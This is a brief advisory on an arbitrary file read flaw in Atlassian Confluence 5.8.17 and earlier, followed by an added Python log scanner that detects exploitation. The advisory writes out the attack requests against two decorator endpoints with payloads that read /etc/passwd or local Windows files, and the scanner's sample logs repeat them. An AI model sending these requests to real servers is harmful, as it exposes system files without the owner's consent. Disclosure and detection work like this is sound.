Atlassian Confluence
Atlassian Confluence is enterprise knowledge management and collaboration software from the Australian company Atlassian, and it can also be used to build an enterprise wiki. The software enables collaboration and knowledge sharing among team members.
Vulnerability Introduction
Vulnerability Name: Arbitrary File Read
Vulnerability Type: Web vulnerability
Affected Versions: 5.8.17 and earlier
Vulnerability Rating: High Critical
Vulnerability Details
Vulnerability request:
https://hostdomain/spaces/viewdefaultdecorator.action?decoratorName=PAYLOAD
https://hostdomain/admin/viewdefaultdecorator.action?decoratorName=PAYLOAD
PAYLOAD => file:///d:/xxx/xxx or file:////etc/passwd
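Detection example (added here, not part of the original advisory or of Atlassian's code): a log scan that flags requests to the two endpoints above whose decoratorName decodes to a file: URL, including percent-encoded and double-encoded forms. The combined access-log format, the sample log lines and the function names are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Endpoints named on this page; any context path prefix is allowed.
ENDPOINT = re.compile(r"/(spaces|admin)/viewdefaultdecorator\.action$", re.I)
# Request line of a combined-format access log entry (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def fully_decode(value, rounds=5):
    """Percent-decode repeatedly so double-encoded values are normalised."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_decorator(target):
    """Return the decoded decoratorName if it uses the file: scheme, else None."""
    parts = urlsplit(target)
    if not ENDPOINT.search(parts.path):
        return None
    params = parse_qs(parts.query, keep_blank_values=True)
    for raw in params.get("decoratorName", []):
        value = fully_decode(raw).strip()
        if value.lower().startswith("file:"):
            return value
    return None

def scan(lines):
    """Return (line_number, decoded_value) for each flagged log line."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        value = suspicious_decorator(match.group(1)) if match else None
        if value is not None:
            hits.append((number, value))
    return hits

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2016:10:00:00 +0000] "GET /spaces/viewdefaultdecorator.action?decoratorName=file:///etc/passwd HTTP/1.1" 200 1024',
    '192.0.2.11 - - [01/Jan/2016:10:00:05 +0000] "GET /admin/viewdefaultdecorator.action?decoratorName=file%253A%252F%252F%252Fetc%252Fpasswd HTTP/1.1" 200 1024',
    '192.0.2.12 - - [01/Jan/2016:10:00:09 +0000] "GET /admin/viewdefaultdecorator.action?decoratorName=example-decorator HTTP/1.1" 200 2048',
    '192.0.2.13 - - [01/Jan/2016:10:00:12 +0000] "GET /dashboard.action HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for number, value in scan(SAMPLE_LOG):
        print(f"line {number}: decoratorName={value}")
```

A hit with a 200 response on an instance at or below the affected version is worth following up by checking which file was requested and treating its contents as exposed.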